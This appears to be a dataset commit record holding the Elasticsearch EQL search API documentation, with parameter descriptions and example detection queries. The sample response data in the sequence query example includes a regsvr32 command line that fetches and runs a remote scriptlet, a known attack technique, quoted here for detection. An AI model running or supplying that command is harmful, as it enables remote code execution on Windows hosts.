If both parameters are specified, only the query parameter is used.\n====\n--\n\n[role=\"child_attributes\"]\n[[eql-search-api-response-body]]\n==== {api-response-body-title}\n\n[[eql-search-api-response-body-search-id]]\n`id`::\n+\n--\n(string)\nIdentifier for the search.\n\nThis search ID is only provided if one of the following conditions is met:\n\n* A search request does not return complete results during the\n <<eql-search-api-wait-for-completion-timeout,`wait_for_completion_timeout`>>\n parameter's timeout period, becoming an <<eql-search-async,async search>>.\n \n* The search request's <<eql-search-api-keep-on-completion,`keep_on_completion`>>\n parameter is `true`.\n\nYou can use this ID with the <<get-async-eql-search-api,get async EQL search\nAPI>> to get the current status and available results for the search.\n--\n\n`is_partial`::\n(boolean)\nIf `true`, the response does not contain complete search results.\n\n`is_running`::\n+\n--\n(boolean)\nIf `true`, the search request is still executing.\n\n[IMPORTANT]\n====\nIf this parameter and the `is_partial` parameter are `true`, the search is an\n<<eql-search-async,ongoing async search>>. If the `keep_alive` period does not\npass, the complete search results will be available when the search completes.\n\nIf `is_partial` is `true` but `is_running` is `false`, the search returned\npartial results due to a failure. Only some shards returned results or the node\ncoordinating the search failed.\n====\n--\n\n`took`::\n+\n--\n(integer)\nMilliseconds it took {es} to execute the request.\n\nThis value is calculated by measuring the time elapsed\nbetween receipt of a request on the coordinating node\nand the time at which the coordinating node is ready to send the response.\n\nTook time includes:\n\n* Communication time between the coordinating node and data nodes\n* Time the request spends in the `search` <<modules-threadpool,thread pool>>,\n queued for execution\n* Actual execution time\n\nTook time does *not* include:\n\n* Time needed to send the request to {es}\n* Time needed to serialize the JSON response\n* Time needed to send the response to a client\n--\n\n`timed_out`::\n(boolean)\nIf `true`, the request timed out before completion.\n\n`hits`::\n(object)\nContains matching events and sequences. Also contains related metadata.\n+\n.Properties of `hits`\n[%collapsible%open]\n====\n\n`total`::\n(object)\nMetadata about the number of matching events or sequences.\n+\n.Properties of `total`\n[%collapsible%open]\n=====\n\n`value`::\n(integer)\nFor <<eql-basic-syntax,basic queries>>, the total number of matching events.\n+\nFor <<eql-sequences,sequence queries>>, the total number of matching sequences.\n\n`relation`::\n+\n--\n(string)\nIndicates whether the number of events or sequences returned is accurate or a\nlower bound.\n\nReturned values are:\n\n`eq`::: Accurate\n`gte`::: Lower bound, including returned events or sequences\n--\n=====\n\n`sequences`::\n(array of objects)\nContains event sequences matching the query. Each object represents a\nmatching sequence. This parameter is only returned for EQL queries containing\na <<eql-sequences,sequence>>.\n+\n.Properties of `sequences` objects\n[%collapsible%open]\n=====\n`join_keys`::\n(array of values)\nShared field values used to constrain matches in the sequence. These are defined\nusing the <<eql-sequences,`by` keyword>> in the EQL query syntax.\n\n`events`::\n(array of objects)\nContains events matching the query. 
Each object represents a\nmatching event.\n+\n.Properties of `events` objects\n[%collapsible%open]\n======\n`_index`::\n(string)\nName of the index containing the event.\n\n`_id`::\n(string)\nUnique identifier for the event.\nThis ID is only unique within the index.\n\n`_source`::\n(object)\nOriginal JSON body passed for the event at index time.\n======\n=====\n\n[[eql-search-api-response-events]]\n`events`::\n(array of objects)\nContains events matching the query. Each object represents a\nmatching event.\n+\n.Properties of `events` objects\n[%collapsible%open]\n=====\n`_index`::\n(string)\nName of the index containing the event.\n\n`_id`::\n(string)\nUnique identifier for the event.\nThis ID is only unique within the index.\n\n`_source`::\n(object)\nOriginal JSON body passed for the event at index time.\n=====\n====\n\n[[eql-search-api-example]]\n==== {api-examples-title}\n\n[[eql-search-api-basic-query-ex]]\n===== Basic query example\n\nThe following EQL search request searches for events with an `event.category` of\n`process` that meet the following conditions:\n\n* A `process.name` of `cmd.exe`\n* A `process.pid` other than `2013`\n\n[source,console]\n----\nGET \/my-index-000001\/_eql\/search\n{\n \"query\": \"\"\"\n process where (process.name == \"cmd.exe\" and process.pid != 2013)\n \"\"\"\n}\n----\n\/\/ TEST[setup:sec_logs]\n\nThe API returns the following response. Matching events in the `hits.events`\nproperty are sorted by <<eql-search-api-timestamp-field,timestamp>>, converted\nto milliseconds since the {wikipedia}\/Unix_time[Unix epoch],\nin ascending order.\n\nIf two or more events share the same timestamp, the\n<<eql-search-api-tiebreaker-field,`tiebreaker_field`>> field is used to sort\nthe events in ascending, lexicographic order.\n\n[source,console-result]\n----\n{\n \"is_partial\": false,\n \"is_running\": false,\n \"took\": 6,\n \"timed_out\": false,\n \"hits\": {\n \"total\": {\n \"value\": 2,\n \"relation\": \"eq\"\n },\n \"events\": [\n {\n \"_index\": \"my-index-000001\",\n \"_id\": \"babI3XMBI9IjHuIqU0S_\",\n \"_source\": {\n \"@timestamp\": \"2099-12-06T11:04:05.000Z\",\n \"event\": {\n \"category\": \"process\",\n \"id\": \"edwCRnyD\",\n \"sequence\": 1\n },\n \"process\": {\n \"pid\": 2012,\n \"name\": \"cmd.exe\",\n \"executable\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\"\n }\n }\n },\n {\n \"_index\": \"my-index-000001\",\n \"_id\": \"b6bI3XMBI9IjHuIqU0S_\",\n \"_source\": {\n \"@timestamp\": \"2099-12-07T11:06:07.000Z\",\n \"event\": {\n \"category\": \"process\",\n \"id\": \"cMyt5SZ2\",\n \"sequence\": 3\n },\n \"process\": {\n \"pid\": 2012,\n \"name\": \"cmd.exe\",\n \"executable\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\"\n }\n }\n }\n ]\n }\n}\n----\n\/\/ TESTRESPONSE[s\/\"took\": 6\/\"took\": $body.took\/]\n\/\/ TESTRESPONSE[s\/\"_id\": \"babI3XMBI9IjHuIqU0S_\"\/\"_id\": $body.hits.events.0._id\/]\n\/\/ TESTRESPONSE[s\/\"_id\": \"b6bI3XMBI9IjHuIqU0S_\"\/\"_id\": $body.hits.events.1._id\/]\n\n
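===== Filter example\n\nAs an illustrative sketch (reusing the index and fields assumed by the other examples on this page), the following request uses the `filter` request body parameter to restrict the basic query to a hypothetical time window with a query DSL <<query-dsl-range-query,`range`>> query:\n\n[source,console]\n----\nGET \/my-index-000001\/_eql\/search\n{\n \"filter\": {\n \"range\": {\n \"@timestamp\": {\n \"gte\": \"2099-12-06T00:00:00.000Z\",\n \"lte\": \"2099-12-07T23:59:59.999Z\"\n }\n }\n },\n \"query\": \"\"\"\n process where (process.name == \"cmd.exe\" and process.pid != 2013)\n \"\"\"\n}\n----\n\nOnly events that match the query DSL filter are considered by the EQL query.\n\n[[eql-search-api-sequence-ex]]\n===== Sequence query example\n\nThe following EQL search request matches a <<eql-sequences,sequence>> of events\nthat:\n\n. Start with an event with:\n+\n--\n* An `event.category` of `file`\n* A `file.name` of `cmd.exe`\n* A `process.pid` other than `2013`\n--\n. 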
Followed by an event with:\n+\n--\n* An `event.category` of `process`\n* A `process.executable` that contains the substring `regsvr32`\n--\n\nThese events must also share the same `process.pid` value.\n\n[source,console]\n----\nGET \/my-index-000001\/_eql\/search\n{\n \"query\": \"\"\"\n sequence by process.pid\n [ file where file.name == \"cmd.exe\" and process.pid != 2013 ]\n [ process where stringContains(process.executable, \"regsvr32\") ]\n \"\"\"\n}\n----\n\/\/ TEST[setup:sec_logs]\n\nThe API returns the following response. Matching sequences are included in the\n`hits.sequences` property. The `hits.sequences.join_keys` property contains the\nshared `process.pid` value for each matching event.\n\n[source,console-result]\n----\n{\n \"is_partial\": false,\n \"is_running\": false,\n \"took\": 6,\n \"timed_out\": false,\n \"hits\": {\n \"total\": {\n \"value\": 1,\n \"relation\": \"eq\"\n },\n \"sequences\": [\n {\n \"join_keys\": [\n 2012\n ],\n \"events\": [\n {\n \"_index\": \"my-index-000001\",\n \"_id\": \"AtOJ4UjUBAAx3XR5kcCM\",\n \"_source\": {\n \"@timestamp\": \"2099-12-06T11:04:07.000Z\",\n \"event\": {\n \"category\": \"file\",\n \"id\": \"dGCHwoeS\",\n \"sequence\": 2\n },\n \"file\": {\n \"accessed\": \"2099-12-07T11:07:08.000Z\",\n \"name\": \"cmd.exe\",\n \"path\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n \"type\": \"file\",\n \"size\": 16384\n },\n \"process\": {\n \"pid\": 2012,\n \"name\": \"cmd.exe\",\n \"executable\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\"\n }\n }\n },\n {\n \"_index\": \"my-index-000001\",\n \"_id\": \"OQmfCaduce8zoHT93o4H\",\n \"_source\": {\n \"@timestamp\": \"2099-12-07T11:07:09.000Z\",\n \"event\": {\n \"category\": \"process\",\n \"id\": \"aR3NWVOs\",\n \"sequence\": 4\n },\n \"process\": {\n \"pid\": 2012,\n \"name\": \"regsvr32.exe\",\n \"command_line\": \"regsvr32.exe \/s \/u \/i:https:\/\/...RegSvr32.sct scrobj.dll\",\n \"executable\": \"C:\\\\Windows\\\\System32\\\\regsvr32.exe\"\n }\n }\n }\n ]\n }\n ]\n }\n}\n----\n\/\/ TESTRESPONSE[s\/\"took\": 6\/\"took\": $body.took\/]\n\/\/ TESTRESPONSE[s\/\"_id\": \"AtOJ4UjUBAAx3XR5kcCM\"\/\"_id\": $body.hits.sequences.0.events.0._id\/]\n\/\/ TESTRESPONSE[s\/\"_id\": \"OQmfCaduce8zoHT93o4H\"\/\"_id\": $body.hits.sequences.0.events.1._id\/]\n","old_contents":"[role=\"xpack\"]\n[testenv=\"basic\"]\n\n[[eql-search-api]]\n=== EQL search API\n++++\n<titleabbrev>EQL search<\/titleabbrev>\n++++\n\nbeta::[]\n\nReturns search results for an <<eql,Event Query Language (EQL)>> query.\n\nEQL assumes each document in a data stream or index corresponds to an\nevent.\n\n[source,console]\n----\nGET \/my-index-000001\/_eql\/search\n{\n \"query\": \"\"\"\n process where process.name == \"regsvr32.exe\"\n \"\"\"\n}\n----\n\/\/ TEST[setup:sec_logs]\n\n[[eql-search-api-request]]\n==== {api-request-title}\n\n`GET \/<target>\/_eql\/search`\n\n`POST \/<target>\/_eql\/search`\n\n[[eql-search-api-prereqs]]\n==== {api-prereq-title}\n\nSee <<eql-required-fields>>.\n\n[[eql-search-api-limitations]]\n===== Limitations\n\nSee <<eql-syntax-limitations,EQL limitations>>.\n\n[[eql-search-api-path-params]]\n==== {api-path-parms-title}\n\n`<target>`::\n(Required, string)\nComma-separated list of data streams, indices, or <<indices-aliases,index\naliases>> used to limit the request. 
Accepts wildcard (`*`) expressions.\n+\nTo search all data streams and indices in a cluster, use\n`_all` or `*`.\n\n[[eql-search-api-query-params]]\n==== {api-query-parms-title}\n\ninclude::{es-repo-dir}\/rest-api\/common-parms.asciidoc[tag=allow-no-indices]\n+\nDefaults to `false`.\n\ninclude::{es-repo-dir}\/rest-api\/common-parms.asciidoc[tag=expand-wildcards]\n+\nDefaults to `open`.\n\ninclude::{es-repo-dir}\/rest-api\/common-parms.asciidoc[tag=index-ignore-unavailable]\n\n`keep_alive`::\n+\n--\n(Optional, <<time-units,time value>>)\nPeriod for which the search and its results are stored on the cluster. Defaults\nto `5d` (five days).\n\nWhen this period expires, the search and its results are deleted, even if the\nsearch is still ongoing.\n\nIf the <<eql-search-api-keep-on-completion,`keep_on_completion`>> parameter is\n`false`, {es} only stores <<eql-search-async,async searches>> that do not\ncomplete within the period set by the\n<<eql-search-api-wait-for-completion-timeout,`wait_for_completion_timeout`>>\nparameter, regardless of this value.\n\n[IMPORTANT]\n====\nYou can also specify this value using the `keep_alive` request body parameter.\nIf both parameters are specified, only the query parameter is used.\n====\n--\n\n`keep_on_completion`::\n+\n--\n(Optional, boolean)\nIf `true`, the search and its results are stored on the cluster.\n\nIf `false`, the search and its results are stored on the cluster only if the\nrequest does not complete during the period set by the\n<<eql-search-api-wait-for-completion-timeout,`wait_for_completion_timeout`>>\nparameter. Defaults to `false`.\n\n[IMPORTANT]\n====\nYou can also specify this value using the `keep_on_completion` request body\nparameter. If both parameters are specified, only the query parameter is used.\n====\n--\n\n`wait_for_completion_timeout`::\n+\n--\n(Optional, <<time-units,time value>>)\nTimeout duration to wait for the request to finish. Defaults to no\ntimeout, meaning the request waits for complete search results.\n\nIf this parameter is specified and the request completes during this period,\ncomplete search results are returned.\n\nIf the request does not complete during this period, the search becomes an\n<<eql-search-async,async search>>.\n\n[IMPORTANT]\n====\nYou can also specify this value using the `wait_for_completion_timeout` request\nbody parameter. If both parameters are specified, only the query parameter is\nused.\n====\n--\n\n[[eql-search-api-request-body]]\n==== {api-request-body-title}\n\n`event_category_field`::\n(Required*, string)\nField containing the event classification, such as `process`, `file`, or\n`network`.\n+\nDefaults to `event.category`, as defined in the {ecs-ref}\/ecs-event.html[Elastic\nCommon Schema (ECS)]. If a data stream or index does not contain the\n`event.category` field, this value is required.\n+\nThe event category field must be mapped as a field type in the\n<<keyword,`keyword`>> family.\n\n`fetch_size`::\n(Optional, integer)\nMaximum number of events to search at a time for sequence queries. Defaults to\n`1000`.\n+\nThis value must be greater than `2` but cannot exceed the value of the\n<<index-max-result-window,`index.max_result_window`>> setting, which defaults to\n`10000`.\n+\nInternally, a sequence query fetches and paginates sets of events to search for\nmatches. This parameter controls the size of those sets. 
This parameter does not\nlimit the total number of events searched or the number of matching events\nreturned.\n+\nA greater `fetch_size` value often increases search speed but uses more memory.\n\n`filter`::\n(Optional, <<query-dsl,query DSL object>>)\nQuery, written in query DSL, used to filter the events on which the EQL query\nruns.\n\n`keep_alive`::\n+\n--\n(Optional, <<time-units,time value>>)\nPeriod for which the search and its results are stored on the cluster. Defaults\nto `5d` (five days).\n\nWhen this period expires, the search and its results are deleted, even if the\nsearch is still ongoing.\n\nIf the <<eql-search-api-keep-on-completion,`keep_on_completion`>> parameter is\n`false`, {es} only stores <<eql-search-async,async searches>> that do not\ncomplete within the period set by the\n<<eql-search-api-wait-for-completion-timeout,`wait_for_completion_timeout`>>\nparameter, regardless of this value.\n\n[IMPORTANT]\n====\nYou can also specify this value using the `keep_alive` query parameter.\nIf both parameters are specified, only the query parameter is used.\n====\n--\n\n[[eql-search-api-keep-on-completion]]\n`keep_on_completion`::\n+\n--\n(Optional, boolean)\nIf `true`, the search and its results are stored on the cluster.\n\nIf `false`, the search and its results are stored on the cluster only if the\nrequest does not complete during the period set by the\n<<eql-search-api-wait-for-completion-timeout,`wait_for_completion_timeout`>>\nparameter. Defaults to `false`.\n\n[IMPORTANT]\n====\nYou can also specify this value using the `keep_on_completion` query parameter.\nIf both parameters are specified, only the query parameter is used.\n====\n--\n\n[[eql-search-api-request-query-param]]\n`query`::\n(Required, string)\n<<eql-syntax,EQL>> query you wish to run.\n\n`size`::\n(Optional, integer or float)\nFor <<eql-basic-syntax,basic queries>>, the maximum number of matching events to\nreturn.\n+\nFor <<eql-sequences,sequence queries>>, the maximum number of matching sequences\nto return.\n+\nDefaults to `10`. This value must be greater than `0`.\n+\nNOTE: You cannot use <<eql-pipe-ref,pipes>>, such as `head` or `tail`, to exceed\nthis value.\n\n[[eql-search-api-tiebreaker-field]]\n`tiebreaker_field`::\n(Optional, string)\nField used to sort events with the same\n<<eql-search-api-timestamp-field,timestamp field>> value. Defaults to\n`event.sequence`, as defined in the {ecs-ref}\/ecs-event.html[Elastic Common\nSchema (ECS)].\n+\nBy default, matching events in the search response are sorted by timestamp,\nconverted to milliseconds since the {wikipedia}\/Unix_time[Unix\nepoch], in ascending order. If two or more events share the same timestamp, this\nfield is used to sort the events in ascending, lexicographic order.\n\n[[eql-search-api-timestamp-field]]\n`timestamp_field`::\n+\n--\n(Required*, string)\nField containing event timestamp.\n\nDefaults to `@timestamp`, as defined in the\n{ecs-ref}\/ecs-event.html[Elastic Common Schema (ECS)]. If a data stream or index\ndoes not contain the `@timestamp` field, this value is required.\n\nEvents in the API response are sorted by this field's value, converted to\nmilliseconds since the {wikipedia}\/Unix_time[Unix epoch], in\nascending order.\n\nThe timestamp field should be mapped as a <<date,`date`>>. 
The\n<<date_nanos,`date_nanos`>> field type is not supported.\n--\n\n[[eql-search-api-wait-for-completion-timeout]]\n`wait_for_completion_timeout`::\n+\n--\n(Optional, <<time-units,time value>>)\nTimeout duration to wait for the request to finish. Defaults to no\ntimeout, meaning the request waits for complete search results.\n\nIf this parameter is specified and the request completes during this period,\ncomplete search results are returned.\n\nIf the request does not complete during this period, the search becomes an\n<<eql-search-async,async search>>.\n\n[IMPORTANT]\n====\nYou can also specify this value using the `wait_for_completion_timeout` query\nparameter. If both parameters are specified, only the query parameter is used.\n====\n--\n\n[role=\"child_attributes\"]\n[[eql-search-api-response-body]]\n==== {api-response-body-title}\n\n[[eql-search-api-response-body-search-id]]\n`id`::\n+\n--\n(string)\nIdentifier for the search.\n\nThis search ID is only provided if one of the following conditions is met:\n\n* A search request does not return complete results during the\n <<eql-search-api-wait-for-completion-timeout,`wait_for_completion_timeout`>>\n parameter's timeout period, becoming an <<eql-search-async,async search>>.\n \n* The search request's <<eql-search-api-keep-on-completion,`keep_on_completion`>>\n parameter is `true`.\n\nYou can use this ID with the <<get-async-eql-search-api,get async EQL search\nAPI>> to get the current status and available results for the search.\n--\n\n`is_partial`::\n(boolean)\nIf `true`, the response does not contain complete search results.\n\n`is_running`::\n+\n--\n(boolean)\nIf `true`, the search request is still executing.\n\n[IMPORTANT]\n====\nIf this parameter and the `is_partial` parameter are `true`, the search is an\n<<eql-search-async,ongoing async search>>. If the `keep_alive` period does not\npass, the complete search results will be available when the search completes.\n\nIf `is_partial` is `true` but `is_running` is `false`, the search returned\npartial results due to a failure. Only some shards returned results or the node\ncoordinating the search failed.\n====\n--\n\n`took`::\n+\n--\n(integer)\nMilliseconds it took {es} to execute the request.\n\nThis value is calculated by measuring the time elapsed\nbetween receipt of a request on the coordinating node\nand the time at which the coordinating node is ready to send the response.\n\nTook time includes:\n\n* Communication time between the coordinating node and data nodes\n* Time the request spends in the `search` <<modules-threadpool,thread pool>>,\n queued for execution\n* Actual execution time\n\nTook time does *not* include:\n\n* Time needed to send the request to {es}\n* Time needed to serialize the JSON response\n* Time needed to send the response to a client\n--\n\n`timed_out`::\n(boolean)\nIf `true`, the request timed out before completion.\n\n`hits`::\n(object)\nContains matching events and sequences. 
Also contains related metadata.\n+\n.Properties of `hits`\n[%collapsible%open]\n====\n\n`total`::\n(object)\nMetadata about the number of matching events or sequences.\n+\n.Properties of `total`\n[%collapsible%open]\n=====\n\n`value`::\n(integer)\nFor <<eql-basic-syntax,basic queries>>, the total number of matching events.\n+\nFor <<eql-sequences,sequence queries>>, the total number of matching sequences.\n\n`relation`::\n+\n--\n(string)\nIndicates whether the number of events or sequences returned is accurate or a\nlower bound.\n\nReturned values are:\n\n`eq`::: Accurate\n`gte`::: Lower bound, including returned events or sequences\n--\n=====\n\n`sequences`::\n(array of objects)\nContains event sequences matching the query. Each object represents a\nmatching sequence. This parameter is only returned for EQL queries containing\na <<eql-sequences,sequence>>.\n+\n.Properties of `sequences` objects\n[%collapsible%open]\n=====\n`join_keys`::\n(array of values)\nShared field values used to constrain matches in the sequence. These are defined\nusing the <<eql-sequences,`by` keyword>> in the EQL query syntax.\n\n`events`::\n(array of objects)\nContains events matching the query. Each object represents a\nmatching event.\n+\n.Properties of `events` objects\n[%collapsible%open]\n======\n`_index`::\n(string)\nName of the index containing the event.\n\n`_id`::\n(string)\nUnique identifier for the event.\nThis ID is only unique within the index.\n\n`_source`::\n(object)\nOriginal JSON body passed for the event at index time.\n======\n=====\n\n[[eql-search-api-response-events]]\n`events`::\n(array of objects)\nContains events matching the query. Each object represents a\nmatching event.\n+\n.Properties of `events` objects\n[%collapsible%open]\n=====\n`_index`::\n(string)\nName of the index containing the event.\n\n`_id`::\n(string)\n(string)\nUnique identifier for the event.\nThis ID is only unique within the index.\n\n`_source`::\n(object)\nOriginal JSON body passed for the event at index time.\n=====\n====\n\n[[eql-search-api-example]]\n==== {api-examples-title}\n\n[[eql-search-api-basic-query-ex]]\n===== Basic query example\n\nThe following EQL search request searches for events with an `event.category` of\n`process` that meet the following conditions:\n\n* A `process.name` of `cmd.exe`\n* An `process.pid` other than `2013`\n\n[source,console]\n----\nGET \/my-index-000001\/_eql\/search\n{\n \"query\": \"\"\"\n process where (process.name == \"cmd.exe\" and process.pid != 2013)\n \"\"\"\n}\n----\n\/\/ TEST[setup:sec_logs]\n\nThe API returns the following response. 
Matching events in the `hits.events`\nproperty are sorted by <<eql-search-api-timestamp-field,timestamp>>, converted\nto milliseconds since the {wikipedia}\/Unix_time[Unix epoch],\nin ascending order.\n\nIf two or more events share the same timestamp, the\n<<eql-search-api-tiebreaker-field,`tiebreaker_field`>> field is used to sort\nthe events in ascending, lexicographic order.\n\n[source,console-result]\n----\n{\n \"is_partial\": false,\n \"is_running\": false,\n \"took\": 6,\n \"timed_out\": false,\n \"hits\": {\n \"total\": {\n \"value\": 2,\n \"relation\": \"eq\"\n },\n \"events\": [\n {\n \"_index\": \"my-index-000001\",\n \"_id\": \"babI3XMBI9IjHuIqU0S_\",\n \"_source\": {\n \"@timestamp\": \"2099-12-06T11:04:05.000Z\",\n \"event\": {\n \"category\": \"process\",\n \"id\": \"edwCRnyD\",\n \"sequence\": 1\n },\n \"process\": {\n \"pid\": 2012,\n \"name\": \"cmd.exe\",\n \"executable\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\"\n }\n }\n },\n {\n \"_index\": \"my-index-000001\",\n \"_id\": \"b6bI3XMBI9IjHuIqU0S_\",\n \"_source\": {\n \"@timestamp\": \"2099-12-07T11:06:07.000Z\",\n \"event\": {\n \"category\": \"process\",\n \"id\": \"cMyt5SZ2\",\n \"sequence\": 3\n },\n \"process\": {\n \"pid\": 2012,\n \"name\": \"cmd.exe\",\n \"executable\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\"\n }\n }\n }\n ]\n }\n}\n----\n\/\/ TESTRESPONSE[s\/\"took\": 6\/\"took\": $body.took\/]\n\/\/ TESTRESPONSE[s\/\"_id\": \"babI3XMBI9IjHuIqU0S_\"\/\"_id\": $body.hits.events.0._id\/]\n\/\/ TESTRESPONSE[s\/\"_id\": \"b6bI3XMBI9IjHuIqU0S_\"\/\"_id\": $body.hits.events.1._id\/]\n\n[[eql-search-api-sequence-ex]]\n===== Sequence query example\n\nThe following EQL search request matches a <<eql-sequences,sequence>> of events\nthat:\n\n. Start with an event with:\n+\n--\n* An `event.category` of `file`\n* A `file.name` of `cmd.exe`\n* An `process.pid` other than `2013`\n--\n. Followed by an event with:\n+\n--\n* An `event.category` of `process`\n* A `process.executable` that contains the substring `regsvr32`\n--\n\nThese events must also share the same `process.pid` value.\n\n[source,console]\n----\nGET \/my-index-000001\/_eql\/search\n{\n \"query\": \"\"\"\n sequence by process.pid\n [ file where file.name == \"cmd.exe\" and process.pid != 2013 ]\n [ process where stringContains(process.executable, \"regsvr32\") ]\n \"\"\"\n}\n----\n\/\/ TEST[setup:sec_logs]\n\nThe API returns the following response. Matching sequences are included in the\n`hits.sequences` property. 
The `hits.sequences.join_keys` property contains the\nshared `process.pid` value for each matching event.\n\n[source,console-result]\n----\n{\n \"is_partial\": false,\n \"is_running\": false,\n \"took\": 6,\n \"timed_out\": false,\n \"hits\": {\n \"total\": {\n \"value\": 1,\n \"relation\": \"eq\"\n },\n \"sequences\": [\n {\n \"join_keys\": [\n 2012\n ],\n \"events\": [\n {\n \"_index\": \"my-index-000001\",\n \"_id\": \"AtOJ4UjUBAAx3XR5kcCM\",\n \"_source\": {\n \"@timestamp\": \"2099-12-06T11:04:07.000Z\",\n \"event\": {\n \"category\": \"file\",\n \"id\": \"dGCHwoeS\",\n \"sequence\": 2\n },\n \"file\": {\n \"accessed\": \"2099-12-07T11:07:08.000Z\",\n \"name\": \"cmd.exe\",\n \"path\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n \"type\": \"file\",\n \"size\": 16384\n },\n \"process\": {\n \"pid\": 2012,\n \"name\": \"cmd.exe\",\n \"executable\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\"\n }\n }\n },\n {\n \"_index\": \"my-index-000001\",\n \"_id\": \"OQmfCaduce8zoHT93o4H\",\n \"_source\": {\n \"@timestamp\": \"2099-12-07T11:07:09.000Z\",\n \"event\": {\n \"category\": \"process\",\n \"id\": \"aR3NWVOs\",\n \"sequence\": 4\n },\n \"process\": {\n \"pid\": 2012,\n \"name\": \"regsvr32.exe\",\n \"command_line\": \"regsvr32.exe \/s \/u \/i:https:\/\/...RegSvr32.sct scrobj.dll\",\n \"executable\": \"C:\\\\Windows\\\\System32\\\\regsvr32.exe\"\n }\n }\n }\n ]\n }\n ]\n }\n}\n----\n\/\/ TESTRESPONSE[s\/\"took\": 6\/\"took\": $body.took\/]\n\/\/ TESTRESPONSE[s\/\"_id\": \"AtOJ4UjUBAAx3XR5kcCM\"\/\"_id\": $body.hits.sequences.0.events.0._id\/]\n\/\/ TESTRESPONSE[s\/\"_id\": \"OQmfCaduce8zoHT93o4H\"\/\"_id\": $body.hits.sequences.0.events.1._id\/]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f1b8df93cd9e0a733c6a597c24270d3c3a61160c","subject":"[DOCS] EQL: Fix hits param for sequences (#57410)","message":"[DOCS] EQL: Fix hits param for sequences (#57410)\n\n","repos":"uschindler\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch","old_file":"docs\/reference\/eql\/eql-search-api.asciidoc","new_file":"docs\/reference\/eql\/eql-search-api.asciidoc","new_contents":"[role=\"xpack\"]\n[testenv=\"basic\"]\n\n[[eql-search-api]]\n=== EQL search API\n++++\n<titleabbrev>EQL search<\/titleabbrev>\n++++\n\nexperimental::[]\n\nReturns search results for an <<eql,Event Query Language (EQL)>> query.\n\nIn {es}, EQL assumes each document in an index corresponds to an event.\n\n\/\/\/\/\n[source,console]\n----\nPUT \/my_index\/_bulk?refresh\n{\"index\":{\"_index\" : \"my_index\", \"_id\" : \"1\"}}\n{ \"@timestamp\": \"2020-12-06T11:04:05.000Z\", \"agent\": { \"id\": \"8a4f500d\" }, \"event\": { \"category\": \"process\" }, \"process\": { \"name\": \"cmd.exe\", \"path\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\" } 
}\n{\"index\":{\"_index\" : \"my_index\", \"_id\" : \"2\"}}\n{ \"@timestamp\": \"2020-12-06T11:04:07.000Z\", \"agent\": { \"id\": \"8a4f500d\" }, \"event\": { \"category\": \"file\" }, \"file\": { \"accessed\": \"2020-12-07T11:07:08.000Z\", \"name\": \"cmd.exe\", \"path\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\", \"type\": \"file\", \"size\": 16384 }, \"process\": { \"name\": \"cmd.exe\", \"path\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\" } }\n{\"index\":{\"_index\" : \"my_index\", \"_id\" : \"3\"}}\n{ \"@timestamp\": \"2020-12-07T11:06:07.000Z\", \"agent\": { \"id\": \"8a4f500d\" }, \"event\": { \"category\": \"process\" }, \"process\": { \"name\": \"cmd.exe\", \"path\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\" } }\n{\"index\":{\"_index\" : \"my_index\", \"_id\" : \"4\"}}\n{ \"@timestamp\": \"2020-12-07T11:07:08.000Z\", \"agent\": { \"id\": \"8a4f500d\" }, \"event\": { \"category\": \"file\" }, \"file\": { \"accessed\": \"2020-12-07T11:07:08.000Z\", \"name\": \"cmd.exe\", \"path\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\", \"type\": \"file\", \"size\": 16384 }, \"process\": { \"name\": \"cmd.exe\", \"path\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\" } }\n{\"index\":{\"_index\" : \"my_index\", \"_id\" : \"5\"}}\n{ \"@timestamp\": \"2020-12-07T11:07:09.000Z\", \"agent\": { \"id\": \"8a4f500d\" }, \"event\": { \"category\": \"process\" }, \"process\": { \"name\": \"regsvr32.exe\", \"path\": \"C:\\\\Windows\\\\System32\\\\regsvr32.exe\" } }\n----\n\/\/ TESTSETUP\n\/\/\/\/\n\n[source,console]\n----\nGET \/my_index\/_eql\/search\n{\n \"query\": \"\"\"\n process where process.name = \"regsvr32.exe\"\n \"\"\"\n}\n----\n\n[[eql-search-api-request]]\n==== {api-request-title}\n\n`GET \/<index>\/_eql\/search`\n\n`POST \/<index>\/_eql\/search`\n\n[[eql-search-api-prereqs]]\n==== {api-prereq-title}\n\nSee <<eql-requirements,EQL requirements>>.\n\n[[eql-search-api-limitations]]\n===== Limitations\n\nSee <<eql-limitations,EQL limitations>>.\n\n[[eql-search-api-path-params]]\n==== {api-path-parms-title}\n\n`<index>`::\n(Required, string)\nComma-separated list of index names or <<indices-aliases,index aliases>> used to\nlimit the request. Accepts wildcard expressions.\n+\nTo search all indices, use `_all` or `*`.\n\n[[eql-search-api-query-params]]\n==== {api-query-parms-title}\n\ninclude::{es-repo-dir}\/rest-api\/common-parms.asciidoc[tag=allow-no-indices]\n+\nDefaults to `false`.\n\ninclude::{es-repo-dir}\/rest-api\/common-parms.asciidoc[tag=expand-wildcards]\n+\nDefaults to 